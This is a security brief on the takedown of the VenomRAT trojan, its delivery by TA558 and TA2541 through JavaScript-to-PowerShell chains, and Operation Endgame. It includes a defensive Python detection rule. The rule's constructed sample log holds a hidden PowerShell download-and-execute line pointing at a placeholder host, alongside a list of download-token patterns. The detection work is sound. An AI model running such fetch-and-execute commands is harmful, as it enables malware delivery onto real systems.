Security brief: VenomRAT is defanged
What happened
VenomRAT is a commodity remote access trojan (RAT) used by multiple cybercriminal threat actors. Around since 2020 but first observed in Proofpoint data in 2022, VenomRAT was used most frequently by TA558, a threat actor that targets the hotel and hospitality sector. The malware is based on the open-source malware Quasar RAT; VenomRAT is essentially a clone of Quasar RAT with some extra components bolted on from other sources.
VenomRAT can be used for information gathering, exfiltration, lateral movement, and to download follow-on payloads. Some VenomRAT variants contain ransomware functionality.
On 13 November 2025, U.S. and international law enforcement announced the disruption of VenomRAT infrastructure and the arrest of the malware’s creator as part of ongoing Operation Endgame efforts. Both the malware advertising and distribution domain (remotesystem[.]in) and the licensing domain (venomlicense[.]com) were taken down as part of the operation. The main VenomRAT suspect was arrested in Greece.
Figure 1. Screenshot of seized distribution domain.
Campaign details
Proofpoint frequently observes VenomRAT in email campaign data, with its prominence increasing among both unattributed threat actors and tracked TAs from mid-2024 through summer 2025.
Figure 2. VenomRAT campaigns observed over time.
The most prominent actor distributing VenomRAT is TA558. Tracked by Proofpoint since 2018, TA558’s targeting focus is mainly on Portuguese and Spanish speakers, typically located in the Latin America region, with additional targeting observed in Western Europe and North America. While the actor favors VenomRAT, TA558 also distributes other commodity malware including njRAT, Remcos RAT, and recently XWorm and PDQ Connect.
TA558 activity accounts for 58% of the VenomRAT activity observed in Proofpoint email campaign data since 2022.
Figure 3. Distribution of VenomRAT by threat actor.
TA558 VenomRAT campaigns typically include 1,000 messages or fewer, with lures in Portuguese, Spanish, and occasionally English. In recent campaigns, messages contained URLs leading to a JavaScript file. If executed, the file spawned PowerShell to download and run VenomRAT.
Figure 4. TA558 lure impersonating a complaints website, August 2025.
The number of unattributed threat clusters using VenomRAT increased in 2024, but another prominent threat actor occasionally included the malware in its arsenal: TA2541. This actor impersonates aviation firms to distribute malware to firms globally, most frequently in North America and Europe. Campaigns typically include fewer than 1,000 messages and follow an attack chain similar to TA558's, with URLs leading to JavaScript files that, if executed, download and run malware.
Figure 5. TA2541 lure impersonating an aviation charter company, April 2025.
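The attack chain described for both TA558 and TA2541 (URL, then a JavaScript file, then PowerShell downloading and running the payload) leaves a recognisable parent/child process pattern: a Windows script host spawning PowerShell with download or obfuscation tokens in its command line. The script below is an added example, not Proofpoint's detection logic, and the log records it checks are constructed in a Sysmon-style Key=Value layout. The field names, the list of download-related tokens and the example.invalid URL are assumptions for illustration; none of them are indicators taken from the campaigns in this brief.

```python
"""Detect a script host (wscript/cscript) spawning PowerShell with download tokens.

Added example: not Proofpoint's code. Log lines are constructed; the field layout
(ParentImage / Image / CommandLine) and the token list are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Windows script hosts that execute a downloaded .js file (the first stage in the chain).
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# PowerShell binaries that the script typically launches as the second stage.
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Generic PowerShell cmdlets/flags that fetch content over the network or hide the command.
# These are ordinary PowerShell features, not VenomRAT-specific indicators (assumed list).
DOWNLOAD_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"invoke-webrequest", r"\biwr\b", r"downloadstring", r"downloadfile",
        r"net\.webclient", r"invoke-expression", r"\biex\b", r"start-bitstransfer",
        r"-e(c|nc|ncodedcommand)?\b",
    )
]


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Matches Key=Value where Value is either a double-quoted string or a run of non-spaces.
_FIELD = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed process-creation record into a ProcessEvent."""
    fields = {}
    for key, raw in _FIELD.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    return ProcessEvent(
        parent_image=fields.get("ParentImage", ""),
        image=fields.get("Image", ""),
        command_line=fields.get("CommandLine", ""),
    )


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so image comparisons ignore the directory."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_script_host_powershell_download(ev: ProcessEvent) -> bool:
    """True when a script host spawned PowerShell and the command line carries download tokens."""
    if basename(ev.parent_image) not in SCRIPT_HOSTS:
        return False
    if basename(ev.image) not in POWERSHELL:
        return False
    return any(p.search(ev.command_line) for p in DOWNLOAD_PATTERNS)


def flag_events(log_text: str) -> list[ProcessEvent]:
    """Return every record in log_text that matches the rule, in log order."""
    events = (parse_event(line) for line in log_text.strip().splitlines())
    return [ev for ev in events if is_script_host_powershell_download(ev)]


# Constructed sample records: two benign, two matching the described chain.
SAMPLE_LOG = r"""
ParentImage=C:\Windows\System32\wscript.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -c Get-Process"
ParentImage=C:\Windows\System32\cscript.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -NoProfile -Command Get-Date"
ParentImage=C:\Windows\System32\cscript.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell -enc SQBFAFgA"
"""

if __name__ == "__main__":
    for ev in flag_events(SAMPLE_LOG):
        print(f"ALERT parent={basename(ev.parent_image)} child={basename(ev.image)} cmd={ev.command_line!r}")
```

The rule keys on the parent/child relationship rather than on any hash or domain, which is what survives when an actor pivots to a new payload, as the Impact section notes TA558 has already done. In production the same logic would be expressed as a SIEM or EDR query over real process-creation telemetry, with the benign third record above showing why the command-line token check is needed to keep administrative scripting from alerting.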
Impact
The disruption to VenomRAT will cause threat actors using the malware to pivot to new payloads. Proofpoint has not observed VenomRAT in campaign data since September 2025, and TA558 has already begun favoring other malware including Remcos RAT and XWorm, with lower volumes of activity since October.
With every law enforcement action, especially those associated with Operation Endgame, Proofpoint observes notable behavior shifts among actors that use email as a first stage malware delivery method. Disruptions often have psychological impacts alongside financial and technological ones. In this case, in addition to pivoting to other payloads, it is possible the threat actors who used VenomRAT may become more wary and mistrustful of malware providers or even concerned about their own activities being monitored by law enforcement. An arrest will also prevent the malware author from developing and selling new tools in the future.
Operation Endgame is a widespread effort conducted by global law enforcement and private sector partners, including Proofpoint, to disrupt malware and botnet infrastructure and identify the alleged individuals associated with the activity. In May 2024, the first Operation Endgame disruption effort targeted multiple malware families including IcedID, Bumblebee, SystemBC, Pikabot, SmokeLoader, and more, and Europol called it the “largest ever operation against botnets, which play a major role in the deployment of ransomware.” The second major Operation Endgame action occurred in May 2025 and targeted additional malware families and their creators, including DanaBot, WarmCookie, Trickbot, and Hijack Loader. The major malware-as-a-service Lumma Stealer has also been targeted by law enforcement.
Operation Endgame disruptions have significantly affected the overall email threat landscape, specifically disrupting activity attributed to known initial access broker (IAB) payloads and supporting malware families delivered via email-based campaigns. For example, in February 2023, 17% of email malware campaigns in Proofpoint data were associated with malware targeted by Operation Endgame, while that number had dropped to 1% by September 2025.
Proofpoint’s mission is to provide the best human-centric protection for our customers against advanced threats. Whenever it is possible and appropriate to do so, and as is the case with Operation Endgame, Proofpoint uses its team’s knowledge and skills to help protect a wider audience against widespread malware threats. Proofpoint was proud to assist in the law enforcement investigations into VenomRAT activity.